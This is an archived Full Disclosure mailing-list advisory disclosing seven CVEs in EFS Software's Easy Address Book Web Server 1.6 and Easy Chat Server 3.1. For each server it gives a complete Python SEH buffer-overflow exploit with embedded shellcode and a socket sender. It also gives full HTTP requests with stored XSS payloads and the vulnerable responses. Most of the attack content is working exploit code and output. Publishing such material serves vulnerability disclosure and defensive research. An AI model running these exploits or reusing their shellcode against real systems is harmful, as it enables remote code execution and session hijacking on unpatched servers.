[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CANoQWWeJiEbMXyStQU4+f3GoJMTNr8tgKNXGonZUcjgEbHY7ng@mail.gmail.com>
Date: Wed, 30 Aug 2023 12:42:43 +0200
From: Rafael Pedrero <rafael.pedrero@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] [CVE-2023-4491, CVE-2023-4492, CVE-2023-4493, CVE-2023-4494,
CVE-2023-4495, CVE-2023-4496,
CVE-2023-4497] Multiple vulnerabilities in EFS Software products
# Exploit Title: Easy Address Book Web Server v1.6 - Multiple
Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-01-10
# CVE: CVE-2023-4491, CVE-2023-4492, CVE-2023-4493
# Vendor Homepage: http://www.efssoft.com/web-address-book-server.html
# Software Link : http://www.efssoft.com/eabws.exe (md5sum:
69f77623bb32589fb5343f598b61bbd9)
# Tested Version: 1.6
# Tested on: Windows 7, 10
# CVE-2023-4491: Vulnerability Type: searchbook Remote Buffer Overflow
CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-119
Vulnerability description: There is a remote stack-based buffer overflow
(SEH) in /searchbook.ghp in EFS Software Easy Address Book Web Server 1.6.
By sending an overly long username string to /searchbook.ghp for asking the
name via POST, an attacker may be able to execute arbitrary code.
Proof of concept:
import socket
import struct
def sendbuff():
# > arwin.exe kernel32.dll WinExec
# WinExec is located at 0x776f2c91 in kernel32.dll
shellcode_WinExec = (
"\x33\xc0" # XOR EAX,EAX
"\x50" # PUSH EAX => padding for lpCmdLine
"\x68\x2E\x65\x78\x65" # PUSH ".exe"
"\x68\x63\x61\x6C\x63" # PUSH "calc"
"\x8B\xC4" # MOV EAX,ESP
"\x6A\x01" # PUSH 1
"\x50" # PUSH EAX
"\xBB\x91\x2c\x6f\x77" # MOV EBX,kernel32.WinExec
"\xFF\xD3") # CALL EBX
shellcode_system = (
"\x31\xC9" # xor ecx,ecx
"\x51" # push ecx
"\x68\x63\x61\x6C\x63" # push 0x636c6163
"\x54" # push dword ptr esp
"\xB8\x6f\xb1\xdc\x75" # mov eax,msvcrt.system
"\xFF\xD0") # call eax
shellcode = shellcode_WinExec
# SEH
junk1 = "A"*455
buffer = junk1
buffer += "\xeb\x10\x90\x90" # jmp 0x10 to nops to shellcode
buffer += struct.pack('<L',0x1001071e) # pop/pop/ret @ 0x1001071e
SSLEAY32.DLL from !Mona 0x1001071e
buffer += "\x90" * 20
buffer += shellcode
junk2 = "D"*(840 - 455 - len(shellcode) - 4 - 4 - 20)
buffer += junk2
return buffer
def REQ_POST (padding):
POST = (
"POST http://"+str(ip)+"/searchbook.ghp?id=1 HTTP/1.1\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0\r\n"
"Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Content-Length: " + str(108 + len(padding))+ "\r\n"
"Connection: keep-alive\r\n"
"Referer: http://"+str(ip)+"/searchcontact.ghp?id=1\r\n"
"Cookie: SESSIONID=3938; UserID=; PassWD=\r\n"
"Upgrade-Insecure-Requests: 1\r\n"
"Host: "+str(ip)+"\r\n\r\n"
"addrbookid=1&contactid=%3C%21--cid--%3E&cancelflag=0&name=" + padding
+
"&cancelflag=0&name=AAA&Email=&address=&phone=&other=&search=Start+Search\r\n\r\n"
)
return POST
ip = '192.168.X.X'
port = 80
payload = sendbuff()
try:
print "\n[*] Sending POST (searchbook.ghp) exploit to Easy Address Book
Web Server V1.6, length " + str(len(payload))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(REQ_POST(payload))
s.recv(1024)
s.close()
print "\n[*] Sended POST length " + str(len(payload))
except:
print "Connecting error"
# CVE-2023-4492: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Easy Address Book Web Server v1.6, does not
sufficiently encode user-controlled inputs, resulting in a stored
Cross-Site Scripting (XSS) vulnerability via the /addrbook.ghp (POST
method), in multiple parameters.
Proof of concept:
POST http://localhost/addrbook.ghp?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 475
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/editcontact.ghp?id=1&cid=12
Cookie: SESSIONID=15337; UserID=; PassWD=
Upgrade-Insecure-Requests: 1
Host: localhost
addrbookid=1&contactid=14&cancelflag=0&firstname=%3C%2Fa%3E%3Cscript%3Ealert%2811%29%3B%3C%2Fscript%3E%3Ca%3E&middlename=demo1&lastname=demo1&nickname=demo1&Email=demo1%
40demo1.com
&company=demo1&jobtitle=demo1&department=demo1&office=demo1&workphone=&workfax=&workaddress=demo1&workcity=&workstate=&workzip=&workcountry=USA&homephone=&homefax=&homeaddress=demo1&homecity=&homestate=&homezip=&homecountry=USA&mobilephone=&pager=&email2=&email3=&homepage=¬es=demo1&save=Save
Vulnerable parameters: firstname, homephone, lastname, middlename,
workaddress, workcity, workcountry, workphone, workstate, workzip
Response:
<TR>
<TD class=row2><SPAN class=genmed><A target=_blank
class=genmed href="viewcontact.ghp?id=1&cid=12">demo1
</a><script>alert(1);</script><a> demo1</A></SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed><a href="mailto:
demo1@...o1.com">demo1@...o1.com</a></SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed></SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed></SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed>demo1, , , ,
USA</SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed><a
href="editcontact.ghp?id=1&cid=12">Edit</a></SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed><a
href="javascript:deletecontact('deletecontact.ghp?id=1&cid=12','demo1
</a><script>alert(1);</script><a> demo1')">Delete</a></SPAN></TD>
# CVE-2023-4493: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Easy Address Book Web Server v1.6, does not
sufficiently encode user-controlled inputs, resulting in a stored
Cross-Site Scripting (XSS) vulnerability via the /users_admin.ghp (POST
method, authenticated Admin user), in multiple parameters.
Proof of concept:
Example 1:
POST http://localhost/users_admin.ghp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/users_admin.ghp
Cookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>
Upgrade-Insecure-Requests: 1
Host: localhost
userid=2&username=test&password=test&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&level=user&state=Enable&update_user=Update
Vulnerable parameter: email
Response:
<form method="POST" action="">
<TR>
<input type="hidden" name="userid" value="2">
<TD class=row2 align=left><input type="text" name="username" size="15"
value="test"> </TD>
<TD class=row2 align=left><input type="text" name="password" size="15"
value=""> </TD>
<TD class=row2 align=left><input type="text" name="email" size="35"
value=""><script>alert(1);</script>"> </TD>
<TD class=row2 align=left><select name="level"><option
>guest</option><option selected>user</option><option >power
user</option></select></TD>
<TD class=row2 align=left><select name="state"><option
selected>Enable</option><option >Disable</option></select></TD>
<TD class=row2 align=left><input type="submit" value="Update"
name="update_user"></TD>
<TD class=row2><SPAN class=genmed><A class=genmed
href="user_delete_admin.ghp?2">Delete</A></SPAN></TD>
</TR>
</form>
Example 2:
POST http://localhost/users_admin.ghp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/users_admin.ghp
Cookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>
Upgrade-Insecure-Requests: 1
Host: localhost
userid=2&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=test&email=tt%
40fsdfs.com&level=user&state=Enable&update_user=Update
Vulnerable parameter: username
Response:
<form method="POST" action="">
<TR>
<input type="hidden" name="userid" value="2">
<TD class=row2 align=left><input type="text" name="username" size="15"
value=""><script>alert(1);</script>"> </TD>
<TD class=row2 align=left><input type="text" name="password" size="15"
value=""> </TD>
<TD class=row2 align=left><input type="text" name="email" size="35" value="
tt@...fs.com"> </TD>
<TD class=row2 align=left><select name="level"><option
>guest</option><option selected>user</option><option >power
user</option></select></TD>
<TD class=row2 align=left><select name="state"><option
selected>Enable</option><option >Disable</option></select></TD>
<TD class=row2 align=left><input type="submit" value="Update"
name="update_user"></TD>
<TD class=row2><SPAN class=genmed><A class=genmed
href="user_delete_admin.ghp?2">Delete</A></SPAN></TD>
</TR>
</form>
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# Exploit Title: Easy Chat Server v3.1 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-01-09
# CVE: CVE-2023-4494, CVE-2023-4495, CVE-2023-4496, CVE-2023-4497
# Vendor Homepage: http://www.echatserver.com/
# Software Link : http://echatserver.com/ecssetup.exe (md5sum:
c682138ebbea9af7948a3f142bbd054b)
# Tested Version: 3.1
# Tested on: Windows 7, 10
# CVE-2023-4494: Vulnerability Type: register Remote Buffer Overflow
CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-119
Vulnerability description: There is a remote stack-based buffer overflow
(SEH) in register.ghp in EFS Software Easy Chat Server versions 2.0 to 3.1.
By sending an overly long username string to register.ghp for asking the
username via GET, an attacker may be able to execute arbitrary code.
Proof of concept:
import socket
def sendbuff():
# calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/
# msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin
# [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)
shellcode = (
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
"\x1c\x39\xbd"
)
# SEH
junk1 = "A"*473
buffer = junk1
buffer += "\xeb\x06\x90\x90" # short jmp to shellcode
buffer += "\x1e\x0e\x01\x10" # pop/pop/ret @ 0x10010E1E
SSLEAY32.DLL from !Mona
buffer += shellcode
junk2 = "D"*(600 - 473 - len(shellcode) - 4 - 4)
buffer += junk2
return buffer
def REQ_GET (padding):
GET = (
"GET /register.ghp?username=" + padding + "&password= HTTP/1.1\r\n"
"User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/86.0.4240.75 Safari/537.36\r\n"
"Host: "+str(ip)+":80\r\n"
"Accept-Language: es-es\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Referer: http://"+str(ip)+"\r\n"
"Connection: Keep-Alive\r\n\r\n"
)
return GET
ip = '192.168.X.X' # change the ip address
port = 80
payload = sendbuff()
try:
print "\n[*] Sending GET (register.ghp) exploit to EFS Easy Chat Server
3.1, length " + str(len(payload))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(REQ_GET(payload))
s.recv(1024)
s.close()
print "\n[*] Sended GET length " + str(len(payload))
except:
print "Connection error"
# CVE-2023-4495: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Easy Chat Server v3.1, does not sufficiently
encode user-controlled inputs, resulting in a stored Cross-Site Scripting
(XSS) vulnerability via the /registresult.htm (POST method), in Resume
parameter. The XSS is loaded from /register.ghp.
Proof of concept:
POST http://localhost/registresult.htm HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 257
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/register.ghp?username=
<redacted>&password=<redacted>
Upgrade-Insecure-Requests: 1
Host: localhost
UserName=<redacted>&Password=<redacted>&Password1=demo1&Sex=0&Email=demo1%
25252540demo1.com
&Icon=0.gif&Resume=%3C%2FTEXTAREA%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3CTEXTAREA%3E&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change
Response
<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has been
changed successfully.</center></body>
Go to:
http://localhost/register.ghp?username=<redacted>&password=<redacted>
Response - xss:
<TR><TD>
Your profile/interests:<BR>
<TEXTAREA rows="4" cols="30"
name="Resume"></TEXTAREA><script>alert(1)</script><TEXTAREA></TEXTAREA>
<INPUT type="hidden" name="cw" value="0">
<INPUT type="hidden" name="RoomID" value="<!--$RoomID-->">
<INPUT type="hidden" name="RepUserName" value="<!--$UserName-->">
</TD></TR>
# CVE-2023-4496: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Easy Chat Server v3.1, does not sufficiently
encode user-controlled inputs, resulting in a stored Cross-Site Scripting
(XSS) vulnerability via the /body2.ghp (POST method), in mtowho parameter.
Proof of concept:
POST http://localhost/body2.ghp?username=<redacted>&password=<redacted>&room=4
HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 248
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/chatsubmit.ghp?username=
<redacted>&password=<redacted>&room=4
Upgrade-Insecure-Requests: 1
Host: localhost
staticname=%3A000539&tnewname=&msayinfo=demo+&mnewname=&mtowho=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cscript%3E&mfilters=0&mfont=0&mfcolor=1&elist=100&seltype=Theme&msg=&Submit=Send&sc=on¬ifysound=on&message=demo+&chat_flag=
Response:
<html>
<head>
</head>
<body>
<script language="JavaScript">
<!--
parent.board.document.body.innerHTML=parent.board.document.body.innerHTML+"<br><font
color=green size=2>08:22:16 <a target=chatsubmit
href=javascript:parent.chatsubmit.getname('<redacted>');><redacted></a> =>
<a target=chatsubmit
href=javascript:parent.chatsubmit.getname('</script><script>alert(1);</script><script>');></script><script>alert(1);</script><script></a>
</font><font color=#000000 size=2>demo </font> <img src=/face/100.gif
border=0>";
// -->
</script>
</body>
</html>
# CVE-2023-4497: Vulnerability Type: stored Cross-Site Scripting (XSS) - #3
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Easy Chat Server v3.1, does not sufficiently
encode user-controlled inputs, resulting in a stored Cross-Site Scripting
(XSS) vulnerability via the /registresult.htm (POST method), in Icon
parameter. The XSS is loaded from /users.ghp.
Proof of concept:
POST /registresult.htm HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 235
Origin: http://localhost
Connection: close
Referer: http://localhost/register.ghp?username=
<redacted>&password=<redacted>
Upgrade-Insecure-Requests: 1
UserName=<redacted>&Password=<redacted>&Password1=<redacted>&Sex=0&Email=<redacted>%252525252540<redacted>.com&Icon="><script>alert(111)</script><img%20src="1.gif&Resume=AAA&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change
Response:
<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has been
changed successfully.</center></body>
When user information page load:
http://localhost/users.ghp?username=<redacted>&password=<redacted>&room=4
<font color="red">[vip room]</font>
<br><br>
[Online users:1]<br><br>[<a
href="javascript:parent.chatsubmit.getname('All');"
target="chatsubmit">All</a>]
<br><br>
<script>
if(navigator.appName!="Netscape" && parent.chatsubmit.document &&
parent.chatsubmit.document.readyState == "complete")
parent.chatsubmit.listcolorchange();
</script>
<img src="/images/""><script>alert(111)</script><i>[<a
href="javascript:parent.chatsubmit.getname('<redacted>');"
target="chatsubmit"><redacted></a>]<==<br>
<br>
<br><br>
[<a href="javascript:OnRegister();">Change infomation</a>]
</i>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists